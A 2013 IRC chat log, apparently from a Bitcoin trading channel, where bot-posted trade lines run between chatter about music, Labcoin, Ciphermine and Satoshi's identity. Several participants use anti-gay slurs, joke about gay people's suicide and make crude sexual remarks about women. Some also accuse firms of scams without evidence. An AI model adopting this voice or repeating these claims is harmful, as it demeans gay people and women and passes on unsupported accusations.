@ 0.00089943 = 6.6108 BTC [+] Sep 13 18:36:51 [MPEX] [S.MPOE] 650 @ 0.00090046 = 0.5853 BTC [+] Sep 13 18:37:04 [MPEX] [S.MPOE] 150 @ 0.00090301 = 0.1355 BTC [+] Sep 13 18:37:22 ThickAsThieves dunno took a break? Sep 13 18:37:32 i miss them Sep 13 18:37:33 those two are/were awesome Sep 13 18:38:52 yeah i don't think they're on the go anymore Sep 13 18:39:29 hm imgur is really slow for me Sep 13 18:39:58 [BTCTC] [ACTIVEMINING] 5 @ 0.002902 = 0.0145 BTC [-] Sep 13 18:39:59 [BTCTC] [ACTIVEMINING] 10 @ 0.002903 = 0.029 BTC [+] Sep 13 18:40:01 [BTCTC] [ACTIVEMINING] 85 @ 0.002908 = 0.2472 BTC [+] Sep 13 18:40:59 btw mp, i believe the mood leads the music choice, not the reverse Sep 13 18:41:51 moods are learned behaviours in humans. Sep 13 18:41:59 it's the mood that leads to the next line of cocaine, for sure. Sep 13 18:42:01 however... Sep 13 18:42:24 [HAVELOCK] [AM100] 2 @ 0.02114 = 0.0423 BTC [+] Sep 13 18:42:42 indeed there are more factors at play Sep 13 18:42:49 If i listen to this http://www.youtube.com/watch?v=x8NwgXhkADY Sep 13 18:43:05 someone ah i mean jurov was proposing in an unrelated topic this theory whereby poor people are poor because of context. Sep 13 18:43:10 i start smile and dancing with coco nut in hand even if it is winter, music is so important for the mood Sep 13 18:43:11 well, that may be true. the context however... Sep 13 18:43:13 TheSwede75, please only talk when you have proof of Labcoin being real Sep 13 18:43:23 lel Sep 13 18:43:26 ThickAsThieves it's not him lol Sep 13 18:43:29 oh Sep 13 18:43:29 :( Sep 13 18:43:33 who is it? Sep 13 18:43:34 lol Sep 13 18:43:41 some dood's been being funnay for a while. Sep 13 18:43:51 meh Sep 13 18:44:01 knew it Sep 13 18:44:02 labcoin ceo gambling investors $ on just dice Sep 13 18:44:08 under nick of balotelii Sep 13 18:44:18 http://falkvinge.net/2013/09/13/bitcoins-vast-overvaluation-seems-to-be-caused-by-usually-illegal-price-fixing/ Sep 13 18:44:28 [MPEX] [S.MPOE] 7000 @ 0.00090301 = 6.3211 BTC [+] Sep 13 18:44:33 read that one Sep 13 18:44:36 yes poppyscotch? Sep 13 18:44:54 [BTCTC] [DMS.PURCHASE] 100 @ 0.01198 = 1.198 BTC [+] Sep 13 18:44:54 jcpham falkvingey is garnering the distinction of purpose cluelessness by now. Sep 13 18:44:59 labcoin scam from day one Sep 13 18:45:08 anything that say "lab" is obviously a scam Sep 13 18:45:20 labia is a scam Sep 13 18:45:23 jcpham laba is romanian for rubbing one off. Sep 13 18:45:23 mircea_popescu he's calling gox askwalls criminal Sep 13 18:45:40 and saying bitcoins are worth $4.12 Sep 13 18:45:42 jcpham i tried to explain some things to him last year, he just goes glassy. Sep 13 18:46:01 weird people, having difficulty internalising stimuli from the environment. i suppose it's leftover autism. Sep 13 18:46:03 once i saw his website and other article titles i didnt bother reading Sep 13 18:46:04 [MPEX] [S.MPOE] 4716 @ 0.00090301 = 4.2586 BTC [+] Sep 13 18:46:21 hahaha Sep 13 18:46:23 here we go Sep 13 18:46:23 didn't falkvinge put his life savings into bitcoin? Sep 13 18:46:35 obv not Sep 13 18:46:38 he's a bitcoin bajillionaire by now for sure Sep 13 18:46:43 who isn't. Sep 13 18:46:43 http://pinkeyeprints.files.wordpress.com/2013/09/photo-2013-09-13-1-03-21-pm.jpg?w=1024 Sep 13 18:46:43 http://pinkeyeprints.files.wordpress.com/2013/09/photo-2013-09-13-1-03-45-pm.jpg?w=1024 Sep 13 18:47:08 neat Sep 13 18:47:26 i got the new j dilla vinyl Sep 13 18:47:29 cool design Sep 13 18:47:38 4 platters - original album plus all instrumentals Sep 13 18:47:46 http://www.egotripland.com/wp-content/uploads/2013/04/j-dilla-anthem-trucks.jpg Sep 13 18:47:55 rip jdilla Sep 13 18:48:01 ooo, clear vinyl Sep 13 18:48:18 METZ has a white vinyl Sep 13 18:48:28 justin bieber has a 10" clear vinyl Sep 13 18:48:40 dildo? Sep 13 18:48:40 that not a euphemism i mean record Sep 13 18:48:54 i wonder where the market is for that sort of thing? Sep 13 18:48:57 10"s are so odd Sep 13 18:49:08 Kid A was released as a 10" Sep 13 18:49:16 i hate the vinyl its for faggot hipsters Sep 13 18:49:26 i have some whitelables i copy to mp3 Sep 13 18:49:30 96kbps Sep 13 18:49:33 vinyl makes your ears sound like they're getting tickled Sep 13 18:49:45 ears make noise? Sep 13 18:49:47 hipster say you need the 1210 Sep 13 18:49:52 sound? feel Sep 13 18:49:57 sorry, no coffee yet Sep 13 18:50:06 YESSS MAILMAN Sep 13 18:50:08 good band name Sep 13 18:50:11 Ears Make Noise Sep 13 18:50:30 haha Sep 13 18:50:39 I hate discussing musical taste Sep 13 18:50:43 like do make say thing Sep 13 18:50:45 think Sep 13 18:50:45 I turn into a raging faggot Sep 13 18:50:57 your true form? Sep 13 18:51:01 lel Sep 13 18:51:04 Always wonder why everyone else listens to such crap music Sep 13 18:51:14 yeah, i dunno Sep 13 18:51:19 i listen to all types of music Sep 13 18:51:49 if you can't appreciate listening to 36 chambers and fear of music back-to-back, you're not a mature music fan Sep 13 18:51:56 most people that have said that tell me some weird indy bands and muse Sep 13 18:52:01 fuck muse Sep 13 18:52:08 so give some examples Sep 13 18:52:18 well, what kind of music do you like? Sep 13 18:52:24 [BTCTC] [LABCOIN] 100 @ 0.003401 = 0.3401 BTC [-] Sep 13 18:52:25 [BTCTC] [LABCOIN] 250 @ 0.0034 = 0.85 BTC [-] Sep 13 18:52:26 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [-] Sep 13 18:52:28 [BTCTC] [LABCOIN] 200 @ 0.003399 = 0.6798 BTC [-] Sep 13 18:52:28 [BTCTC] [LABCOIN] 449 @ 0.003381 = 1.5181 BTC [-] Sep 13 18:52:31 i asked first Sep 13 18:52:32 i'm not going to just list off random things you hate :P Sep 13 18:52:35 hehe Sep 13 18:52:39 ok, well Sep 13 18:52:41 gogogo list random selection Sep 13 18:52:47 i'll tell you what's been getting played a lot lately here Sep 13 18:53:18 [MPEX] [S.MPOE] 94 @ 0.00089904 = 0.0845 BTC [-] Sep 13 18:53:20 [MPEX] [S.MPOE] 5800 @ 0.00089728 = 5.2042 BTC [-] Sep 13 18:53:33 [BTCTC] [DMS.MINING] 10 @ 0.002696 = 0.027 BTC [-] Sep 13 18:53:39 it's awesome when BTCT logs you out and then tells you access denied when you try to log in Sep 13 18:53:39 ol' dirty bastard, chad vangaalen, talking heads, deer hoof, jonathan rich man, sufjan stevens, lightning bolt, leonard cohen, dr. john, captain beefheart Sep 13 18:53:52 love sufjan Sep 13 18:53:58 those are all in the "haven't bothered to put them away" vinyl stack Sep 13 18:54:09 especially the newer stuff Sep 13 18:54:28 not something you can say about many artists Sep 13 18:54:31 i've been listening to seven swans a lot lately Sep 13 18:54:37 but i think that's early 00's Sep 13 18:54:49 Age of Adz vinyl has gotten a fair amount of play by me Sep 13 18:54:52 dr. john is still fucking GREAT too Sep 13 18:55:03 his most recent album is amazing Sep 13 18:55:04 AMAZING COMPANY! Sep 13 18:55:13 hehe Sep 13 18:55:32 assbot should autoreplace the labcoin ticker Sep 13 18:55:33 [BTCTC] [DMS.MINING] 2 @ 0.002696 = 0.0054 BTC [-] Sep 13 18:55:39 with AMAZINGCOMPANY Sep 13 18:55:40 the only muse song i've ever heard is a lightning bolt cover Sep 13 18:55:45 and they play it at like 0.25x tempo Sep 13 18:55:54 and the crowd goes YEAAAAAAHHHHHH Sep 13 18:56:01 but it's so slow and lame Sep 13 18:56:01 AMGZ.CO Sep 13 18:56:02 I'm listening to that sufjan stevens now all the trees Sep 13 18:56:05 i want that ticker. Sep 13 18:56:08 love the instrumental Sep 13 18:56:28 amzg Sep 13 18:56:43 lol you can't autoreplace tags. Sep 13 18:56:44 oh, black pus is really good too, if you're into drums Sep 13 18:56:48 lead singer sounds little like a pansy though..thts my problem with most indy Sep 13 18:57:10 http://upload.wikimedia.org/wikipedia/commons/thumb/d/d2/Sufjan_Stevens_playing_banjo.jpg/1280px-Sufjan_Stevens_playing_banjo.jpg Sep 13 18:57:15 that look like a pansy to you?!?! ;p Sep 13 18:57:21 yes Sep 13 18:57:31 lel Sep 13 18:57:31 yeah he'll kill himself eventually Sep 13 18:57:45 i thought all gay christians killed themselves eventually? Sep 13 18:57:45 ThickAsThieves but before that he'll make a lot of cock very happy. Sep 13 18:57:50 [BTCTC] [LABCOIN] 1 @ 0.003489 BTC [+] Sep 13 18:57:53 shit, he actually is gay ? Sep 13 18:57:58 I'm looking for lovely instrumentals Sep 13 18:58:00 afaik Sep 13 18:58:15 lots of songs about kissing boys Sep 13 18:58:16 i guess i have a gayorzometer. Sep 13 18:58:22 well, ya know what they say Sep 13 18:58:29 [MPEX] [S.MPOE] 2206 @ 0.00089628 = 1.9772 BTC [-] Sep 13 18:58:36 you can tell the gay from the vocal vibrations Sep 13 18:58:37 birds of a feather! Sep 13 18:58:43 http://www.youtube.com/watch?v=9EzeW5KoPUI Sep 13 18:59:06 okay, i apologize in advance for this next one Sep 13 18:59:13 it's REALLY loud and the quality kinda sucks Sep 13 18:59:21 but this is pure unbridled insanity once it gets going Sep 13 18:59:22 http://www.youtube.com/watch?v=dpG9teznu30 Sep 13 18:59:42 breaks a stick 0:37 ;( Sep 13 19:00:02 one of worst songs heard Sep 13 19:00:34 garbage Sep 13 19:00:41 haha Sep 13 19:00:49 keep listening Sep 13 19:01:07 the crowd is like "this is cool, right?" Sep 13 19:01:10 anyway, muse tried to cover one of this guy's songs Sep 13 19:01:13 crowd is very lel Sep 13 19:01:23 [BTCTC] [CIPHERMINE-PT] 1 @ 0.061 BTC Sep 13 19:01:25 [BTCTC] [CIPHERMINE-PT] 2 @ 0.0601 = 0.1202 BTC [-] Sep 13 19:01:26 [BTCTC] [CIPHERMINE-PT] 2 @ 0.0601 = 0.1202 BTC [-] Sep 13 19:01:28 [BTCTC] [CIPHERMINE-PT] 15 @ 0.06 = 0.9 BTC [-] Sep 13 19:01:29 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:30 [BTCTC] [CIPHERMINE-PT] 50 @ 0.06 = 3 BTC [-] Sep 13 19:01:30 [BTCTC] [CIPHERMINE-PT] 83 @ 0.06 = 4.98 BTC [-] Sep 13 19:01:31 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:33 [BTCTC] [CIPHERMINE-PT] 30 @ 0.06 = 1.8 BTC [-] Sep 13 19:01:34 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:35 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:36 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:37 [BTCTC] [CIPHERMINE-PT] 10 @ 0.06 = 0.6 BTC [-] Sep 13 19:01:38 [BTCTC] [CIPHERMINE-PT] 66 @ 0.06 = 3.96 BTC [-] Sep 13 19:01:39 [BTCTC] [CIPHERMINE-PT] 100 @ 0.06 = 6 BTC [-] Sep 13 19:01:40 [BTCTC] [CIPHERMINE-PT] 23 @ 0.06 = 1.38 BTC [-] Sep 13 19:01:40 [BTCTC] [CIPHERMINE-PT] 12 @ 0.06 = 0.72 BTC [-] Sep 13 19:01:41 [BTCTC] [CIPHERMINE-PT] 21 @ 0.06 = 1.26 BTC [-] Sep 13 19:01:43 [BTCTC] [CIPHERMINE-PT] 1 @ 0.06 BTC [-] Sep 13 19:01:44 [BTCTC] [CIPHERMINE-PT] 70 @ 0.06 = 4.2 BTC [-] Sep 13 19:01:45 [BTCTC] [CIPHERMINE-PT] 8 @ 0.06 = 0.48 BTC [-] Sep 13 19:01:46 [BTCTC] [CIPHERMINE-PT] 4 @ 0.06 = 0.24 BTC [-] Sep 13 19:01:47 [BTCTC] [CIPHERMINE-PT] 7 @ 0.06 = 0.42 BTC [-] Sep 13 19:01:48 [BTCTC] [CIPHERMINE-PT] 3 @ 0.06 = 0.18 BTC [-] Sep 13 19:01:49 [BTCTC] [CIPHERMINE-PT] 25 @ 0.06 = 1.5 BTC [-] Sep 13 19:01:50 [BTCTC] [CIPHERMINE-PT] 5 @ 0.06 = 0.3 BTC [-] Sep 13 19:01:51 [BTCTC] [CIPHERMINE-PT] 15 @ 0.06 = 0.9 BTC [-] Sep 13 19:02:00 [BTCTC] [CIPHERMINE-PT] 15 @ 0.06 = 0.9 BTC [-] Sep 13 19:02:01 ono. Sep 13 19:02:18 [BTCTC] [CIPHERMINE-PT] 427 @ 0.06 = 25.62 BTC [-] Sep 13 19:02:20 haha are these people that transferred Sep 13 19:02:34 this chan is great to watch for assbot mostly. Sep 13 19:02:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000651 BTC [-] Sep 13 19:02:56 that's the initial 1k, people set buy orders at .06 to get filled when trading started, sort of like a PT ipo Sep 13 19:02:57 matuszed: i'll process transfers in 6 hours Sep 13 19:03:49 and.. they're gone :P Sep 13 19:03:49 [HAVELOCK] [XBOND] 468 @ 0.001173 = 0.549 BTC [+] Sep 13 19:03:51 [HAVELOCK] [XBOND] 733 @ 0.0011745 = 0.8609 BTC [+] Sep 13 19:05:25 [BTCTC] [DMS.MINING] 1 @ 0.002627 BTC [-] Sep 13 19:05:27 [BTCTC] [DMS.MINING] 73 @ 0.002626 = 0.1917 BTC [-] Sep 13 19:05:28 [BTCTC] [DMS.MINING] 62 @ 0.002625 = 0.1628 BTC [-] Sep 13 19:05:30 [BTCTC] [DMS.MINING] 18 @ 0.002605 = 0.0469 BTC [-] Sep 13 19:05:31 [BTCTC] [DMS.MINING] 652 @ 0.002602 = 1.6965 BTC [-] Sep 13 19:06:48 [BTCTC] [CIPHERMINE-PT] 5 @ 0.0656 = 0.328 BTC [+] Sep 13 19:06:48 [BTCTC] [CIPHERMINE-PT] 10 @ 0.066 = 0.66 BTC [+] Sep 13 19:07:08 should it not be CIPHERMINE-DR? Sep 13 19:07:08 [BTCTC] [DMS.PURCHASE] 1 @ 0.01196 BTC [-] Sep 13 19:07:35 now that burnsy has deemed them all Depositary Receipts Sep 13 19:08:19 [BTCTC] [DMS.PURCHASE] 1 @ 0.01196 BTC [-] Sep 13 19:09:08 [HAVELOCK] [XBOND] 431 @ 0.0011745 = 0.5062 BTC [+] Sep 13 19:09:22 maybe, but i think people are mostely familiar with PT at the moment Sep 13 19:09:31 [BTCTC] [DMS.PURCHASE] 1 @ 0.01196 BTC [-] Sep 13 19:10:04 [MPEX] [S.MPOE] 5090 @ 0.00089973 = 4.5796 BTC [+] Sep 13 19:10:10 oh yeah, i've been listening to death grips a lot lately too Sep 13 19:10:11 really it could just be called CIPHERMINE Sep 13 19:10:15 but those guys are pretty weird as well Sep 13 19:10:45 ThickAsThieves kinda what pt means really. Sep 13 19:10:54 http://www.youtube.com/watch?v=Orlbo9WkZ2E Sep 13 19:11:00 [BTCTC] [TAT.MINIGAME] 1 @ 0.000248 BTC [+] Sep 13 19:11:32 [MPEX] [S.MPOE] 1360 @ 0.00089546 = 1.2178 BTC [-] Sep 13 19:11:34 [MPEX] [S.MPOE] 4484 @ 0.00090301 = 4.0491 BTC [+] Sep 13 19:11:39 [BTCTC] [CIPHERMINE-PT] 15 @ 0.06554 = 0.9831 BTC [-] Sep 13 19:11:50 [MPEX] [S.MPOE] 1905 @ 0.00090333 = 1.7208 BTC [+] Sep 13 19:12:16 [BTCTC] [ASICMINER-PT] 1 @ 2.221 BTC [+] Sep 13 19:13:41 https://www.litecoinglobal.com/security/CIPHERMINE Sep 13 19:13:54 [HAVELOCK] [XBOND] 200 @ 0.0011745 = 0.2349 BTC [+] Sep 13 19:14:24 it's a passthrough from ciphermine LTC to ciphermine BTC Sep 13 19:15:18 I have never heard of ciphermine-pt here either Sep 13 19:15:33 mp, but we are missing the brokerage house Sep 13 19:15:45 seriously Sep 13 19:15:47 maybe I should offer the service Sep 13 19:15:50 [SCAM] [PUMPNDUMP] 100000 @ 10 = 1000000 [+] Sep 13 19:15:51 mostly Sep 13 19:15:58 ThickAsThieves who is holding the actual underlying to cover for the pt ? Sep 13 19:16:00 passthrough all the passthroughs Sep 13 19:16:07 Inception PT Sep 13 19:16:17 LTCGlobal Sep 13 19:16:23 then that'sd your brokerage house. Sep 13 19:16:33 except they do no confirming Sep 13 19:16:40 what's the general consensus on ciphermine? Sep 13 19:16:40 unless issuer makes portfolio public Sep 13 19:17:06 ThickAsThieves the fact that they're a real shitty broker is not in discussion Sep 13 19:17:10 hehe Sep 13 19:17:10 Quad-AMD 7950 mining rigs is this recent stuff? Sep 13 19:17:11 they're a really shitty everything. Sep 13 19:17:16 [BTCTC] [DMS.MINING] 1 @ 0.002605 BTC [+] Sep 13 19:17:17 [BTCTC] [DMS.MINING] 2 @ 0.002604 = 0.0052 BTC [-] Sep 13 19:17:24 nevertjheless, the definitions in thios context are functional. he who holds the underlying is the broker. Sep 13 19:17:25 well maybe i can be a less shittyprovider Sep 13 19:17:25 coconut undervalued atm due to low divs waiting on mining equipment to arrive Sep 13 19:17:29 THe asset is basically a preorder Sep 13 19:17:32 [BTCTC] [DMS.MINING] 241 @ 0.002686 = 0.6473 BTC [+] Sep 13 19:17:33 [BTCTC] [DMS.MINING] 174 @ 0.00269 = 0.4681 BTC [+] Sep 13 19:17:56 it seems very..thorough Sep 13 19:18:15 kate knows her business for sure Sep 13 19:18:20 Ver thorough but no competitve advantage Sep 13 19:18:38 she also knows how to make sure shareholders dont profit Sep 13 19:18:50 Yea and also does a lotta trading of her own securities Sep 13 19:18:53 which she is open about Sep 13 19:18:58 what's kate real name? Sep 13 19:19:01 craig Sep 13 19:19:13 ok Sep 13 19:19:15 kate wood or some such Sep 13 19:19:31 https://forum.litecoin.net/index.php/topic,4582.0.html Sep 13 19:19:51 The asset is doomed to implode Sep 13 19:20:12 anyone link to this kate craig chick? Sep 13 19:20:20 on, Sep 13 19:20:21 They have to constantly keeep buying hardware Sep 13 19:20:23 nm* Sep 13 19:20:38 and paying top dollar for it Sep 13 19:20:48 well at least they seem to not be another shady set of people Sep 13 19:20:54 it's refreshment Sep 13 19:21:18 they do have a level of professionalism Sep 13 19:21:23 fwiw Sep 13 19:21:36 ThickAsThieves: were you behind the NEO IPO? Sep 13 19:21:37 and you measure that by them not swearing? Sep 13 19:21:49 swearing? Sep 13 19:22:05 by being polite Sep 13 19:22:43 well i think a bit more than that Sep 13 19:22:53 coconut, yes I am part of that Sep 13 19:23:06 oh they also got tits Sep 13 19:23:15 it is very nice, good job with it Sep 13 19:23:18 tits ? where ?! Sep 13 19:23:20 hope it will be success Sep 13 19:23:27 in the avatar! Sep 13 19:23:38 [HAVELOCK] [AM100] 7 @ 0.02013 = 0.1409 BTC [-] Sep 13 19:23:42 o. Sep 13 19:23:59 i liek the fiat graph. Sep 13 19:23:59 cwd tho Sep 13 19:24:01 wtf. Sep 13 19:24:52 she likes the fiat Sep 13 19:25:00 the bond is fiat-pegged Sep 13 19:25:26 which makes it at least more interesting than most Sep 13 19:26:03 she tried to make it less exposed to btc volatility for issuer and holder Sep 13 19:26:18 or didnt want the exposure to BTC Sep 13 19:26:39 [HAVELOCK] [AM100] 5 @ 0.02013 = 0.1007 BTC [-] Sep 13 19:26:50 but why make compound instruments. Sep 13 19:27:03 jesus it's so sad, all the amateurs failing to comprehend why finance even exists in the first place. Sep 13 19:27:50 their approach of using kate's data centre might be put into consideration as well and a business plan is available here -> http://docs.ciphermine.com. though i think it's better for me not to comment on this security from now on Sep 13 19:27:50 i recall deprived wanted to do a fiat bond too Sep 13 19:28:09 anyway, anyone know the kate chick enough to get her here ? Sep 13 19:28:29 i think she makes herself pretty accessible Sep 13 19:28:37 i have yet to reach out Sep 13 19:28:40 but seems many have Sep 13 19:28:43 i recommended this chan to her already Sep 13 19:29:41 i'll see if i can find the reply Sep 13 19:29:58 surely she wont subject herself to a meanie like mp Sep 13 19:30:00 [HAVELOCK] [AM100] 18 @ 0.02013 = 0.3623 BTC [-] Sep 13 19:30:27 why not ? Sep 13 19:30:58 probably you will try to troll with him :S Sep 13 19:31:32 "I don't use IRC all that much, apart from with I2P." Sep 13 19:31:33 builds character. Sep 13 19:31:36 https://forum.litecoin.net/index.php/topic,5729.msg43448.html#msg43448 Sep 13 19:31:47 the only real thing i have to say to her is that i dont understand how she intends to make profit for her shareholders Sep 13 19:31:55 tell her i said she's missing out on btc finance then, and it'd be a pity. Sep 13 19:32:27 "I don't use IRC all that much, apart from with I2P. Plus, like you, I'm LTC Global oriented so hope this service will take off. :) Sep 13 19:32:27 Kate." Sep 13 19:32:34 [BTCTC] [DMS.MINING] 1 @ 0.002607 BTC [-] Sep 13 19:33:04 plus, no girls allowed in here! Sep 13 19:33:10 there's girls in here. Sep 13 19:33:25 well i was joking, but who? Sep 13 19:33:34 well kinda the reason they don't want to say. Sep 13 19:33:38 AndrewJackson Sep 13 19:33:43 prime candidate Sep 13 19:33:56 i'm sure she'd welcome a pm from you or a discussion in one of the threads Sep 13 19:33:59 one of bitcoin celebs has published a book Sep 13 19:34:00 the joke was on us more than the girls Sep 13 19:34:21 [HAVELOCK] [SDSTM] 15 @ 0.0024301 = 0.0365 BTC [-] Sep 13 19:34:23 [HAVELOCK] [SDSTM] 135 @ 0.0024301 = 0.3281 BTC [-] Sep 13 19:34:51 aha ive got it! everyone thinks PR is MP, but it's really the reverse Sep 13 19:34:58 Duffer1 i don't even have a btctalk acct, what, im going to make bfl forum / ltc forum etc now ?! Sep 13 19:35:07 ThickAsThieves it was said before you know. Sep 13 19:35:33 they say there is nothing new in the world Sep 13 19:35:42 you don't? Sep 13 19:35:50 you are wrong, there are two mps, one with the beard and one without Sep 13 19:35:59 i have seen it with my own eyes Sep 13 19:37:10 lol Sep 13 19:37:17 teh twin bros of btc. Sep 13 19:37:20 but what if the boy is the PR Sep 13 19:37:26 and the meanie is the girl Sep 13 19:37:47 Does that mean mircea_popescu = girl? Sep 13 19:37:51 [BTCTC] [TAT.ASICMINER] 12 @ 0.02099 = 0.2519 BTC [-] Sep 13 19:37:52 [BTCTC] [TAT.ASICMINER] 43 @ 0.021 = 0.903 BTC [+] Sep 13 19:37:54 right Sep 13 19:38:07 Rulother__ no, it just means people imagining me with tits and perhaps sucking cock too is quite the mindfuck. Sep 13 19:38:08 That explains a lot Sep 13 19:38:22 I never thought of that :\ Sep 13 19:38:27 [BTCTC] [ACTIVEMINING] 4 @ 0.002908 = 0.0116 BTC [+] Sep 13 19:38:28 looky here it's well documented MPOE-PR is very much walking talking seperate person from Mircea who certainly isn't an apple bobbing cocksucker Sep 13 19:38:31 i havent checked the techicalities but superficially its male Sep 13 19:38:50 [BTCTC] [ACTIVEMINING] 1 @ 0.002826 BTC [-] Sep 13 19:38:56 hehe Sep 13 19:39:25 TIL, mircea_popescu has tits Sep 13 19:39:32 dont we all Sep 13 19:39:44 Rulother__ i have all the tits! Sep 13 19:40:17 mircea_popescu: i think you will be good at writing erotica Sep 13 19:40:46 50 Shades of Gay Sep 13 19:40:49 :) Sep 13 19:41:00 50 Shades of Popescu Sep 13 19:41:16 surely this is already a name of a manporn Sep 13 19:41:29 coconut http://trilema.com/2013/margaritas-ante-porcos-as-it-were/ Sep 13 19:41:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.02071 = 0.1036 BTC [-] Sep 13 19:41:59 lol at ThickAsThieves Sep 13 19:42:06 popescu delivers Sep 13 19:42:08 knew you'd have some diamonds Sep 13 19:42:15 wtf i pasted 50 Shaded of Gay into Internet Explorer and it replaced it with Richard Branson Sep 13 19:42:21 lol Sep 13 19:42:22 [BTCTC] [CIPHERMINE-PT] 2 @ 0.0659 = 0.1318 BTC [+] Sep 13 19:42:24 haha Sep 13 19:42:34 more like 50 Shades of Labia Popescu Sep 13 19:42:45 if memory serves me right Sep 13 19:42:53 [HAVELOCK] [VTX] 1 @ 0.586 BTC [-] Sep 13 19:44:00 [MPEX] [S.MPOE] 4950 @ 0.00089674 = 4.4389 BTC [-] Sep 13 19:44:16 in case anyone missed it and wants something else to point at https://bitfunder.com/asset/DISCOVERY Sep 13 19:44:20 and they say I'm mean. Sep 13 19:44:31 this question has probably been asked before lot of times Sep 13 19:44:45 imagine in 3 years you uncover identity of satoshi Sep 13 19:44:54 [BTCTC] [ACTIVEMINING] 9 @ 0.002826 = 0.0254 BTC [-] Sep 13 19:45:06 friedcat is satoshi obv Sep 13 19:45:07 [BTCTC] [ACTIVEMINING] 11 @ 0.002826 = 0.0311 BTC [-] Sep 13 19:45:14 someone offers large amount of money for this info Sep 13 19:45:32 what is the best thing to do? Sep 13 19:45:40 i mean what would you do Sep 13 19:46:33 you're ethically required to publish it. Sep 13 19:47:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0207 BTC [-] Sep 13 19:47:38 if you are not really a smart guy but see he's got some idea which is bigger than you can really appreciate Sep 13 19:47:38 [BTCTC] [DMS.PURCHASE] 9 @ 0.01196 = 0.1076 BTC [-] Sep 13 19:47:39 [BTCTC] [CIPHERMINE-PT] 1 @ 0.0659 BTC [+] Sep 13 19:47:53 you'd want to stay without talking but still if you need money Sep 13 19:47:55 [BTCTC] [TAT.ASICMINER] 14 @ 0.021 = 0.294 BTC [+] Sep 13 19:48:07 someone will do it one day Sep 13 19:48:42 0, 1, infinity rule. either nobody knows who he is, which clearly can't be the case, Sep 13 19:48:50 [BTCTC] [DMS.MINING] 3 @ 0.00265 = 0.008 BTC [+] Sep 13 19:48:55 or exactly one person knows. once two know, it really should be infinity. Sep 13 19:49:37 i wonder if he's ever lurked here Sep 13 19:49:51 just for a laugh Sep 13 19:49:53 [BTCTC] [LABCOIN] 3 @ 0.003478 = 0.0104 BTC [-] Sep 13 19:49:59 TaT is obvioulsy FriedCat who is obviously satoshi Sep 13 19:50:08 no comment Sep 13 19:50:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00065 BTC [-] Sep 13 19:50:27 For figuring this out I should be compensated like 1000 BTC Sep 13 19:50:35 as it wouldnt be a big deal for him to spare Sep 13 19:50:48 sound logic Sep 13 19:50:56 matuszed that's his part to figure out. Sep 13 19:51:20 you can send the reward here 1GcabwLqXL258y8HXSiQ2Ex8AVDUnHtdYF Sep 13 19:51:46 you may have just broken a channel non-rule Sep 13 19:51:56 I discovered satoshi Sep 13 19:52:42 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00065 = 0.002 BTC [-] Sep 13 19:52:56 i'm satoshi's niece Sep 13 19:53:12 Counts fo something Sep 13 19:53:33 i suspect as time goes by this will be like the greatest title btc community can bestow Sep 13 19:53:40 like pater patria. "X dude is satoshi!" Sep 13 19:54:06 Lets say for a second Sep 13 19:54:12 someone actually proves they are satoshi Sep 13 19:54:15 does the price of BTC drop Sep 13 19:54:23 maybe it will become a title Sep 13 19:54:26 not relevant Sep 13 19:54:39 matuszed not really important anymore. Sep 13 19:54:45 in place of Saint (St) Sep 13 19:54:55 haha. satoshi! St Sep 13 19:54:57 Im just thinking from the perspective a large portion of the float Sep 13 19:55:03 is probably held by satoshi Sep 13 19:55:07 and by large like 1-2% Sep 13 19:55:10 im jsut guessing Sep 13 19:55:18 Id think those coins might come into circulation Sep 13 19:55:29 http://farm6.staticflickr.com/5128/5340350892_3299b115dd_z.jpg Sep 13 19:55:30 if he announced himself Sep 13 19:55:44 may we wall strive to be Satoshis in the eyes of the one true God Sep 13 19:57:04 some board members have seen him Sep 13 19:57:13 via skype video Sep 13 19:57:30 sorry Sep 13 19:57:33 i menat friedcat Sep 13 19:57:40 (thats who the pic is sposed to be) Sep 13 19:57:47 [BTCTC] [PETA-MINE] 5 @ 0.6452 = 3.226 BTC [-] Sep 13 19:58:11 that pic is not friecat Sep 13 19:58:33 i have no idea whether it is Sep 13 19:58:33 [BTCTC] [PETA-MINE] 5 @ 0.645 = 3.225 BTC [-] Sep 13 19:58:40 but thats what some people think Sep 13 19:58:48 you can see pic of friedcat by googling name.. Sep 13 19:58:51 ThickAsThieves you mean to tell me nobody has seen him, period ? Sep 13 19:59:07 no i said just the opposite Sep 13 19:59:11 [BTCTC] [LABCOIN] 5 @ 0.003477 = 0.0174 BTC [-] Sep 13 19:59:12 [BTCTC] [LABCOIN] 160 @ 0.003478 = 0.5565 BTC [+] Sep 13 19:59:12 that's most likely roxxie, coconut Sep 13 19:59:13 [BTCTC] [LABCOIN] 1335 @ 0.00348 = 4.6458 BTC [+] Sep 13 19:59:19 if you refer to the presentation Sep 13 19:59:33 [12:57] some board members have seen him Sep 13 19:59:33 [12:57] via skype video Sep 13 19:59:41 [MPEX] [S.MPOE] 3945 @ 0.00090333 = 3.5636 BTC [+] Sep 13 19:59:43 [MPEX] [S.MPOE] 3355 @ 0.00090541 = 3.0377 BTC [+] Sep 13 19:59:58 sounds hot Sep 13 20:00:20 there was at least one skype conference i know of prior to am's ipo Sep 13 20:00:32 dexX7 not rockxie xinyu have pics Sep 13 20:01:28 ThickAsThieves well skype video... it's like saying "some people have fucked her, via wemcams.com" Sep 13 20:01:48 mircea_popescu: pull your mind out of gutter young man Sep 13 20:01:49 it's all i got Sep 13 20:02:20 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.00065 = 0.0182 BTC [-] Sep 13 20:02:22 lol so this small argentine town has an italian association, of the people of itgalian ancestry, who dedicated a little tablet to themselves, and gave the city a lupa capitolina Sep 13 20:02:29 which looks like a strange she-hog. Sep 13 20:06:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.021 = 0.042 BTC [+] Sep 13 20:06:42 [BTCTC] [BASIC-MINING] 1 @ 0.1254 BTC [-] Sep 13 20:06:44 [BTCTC] 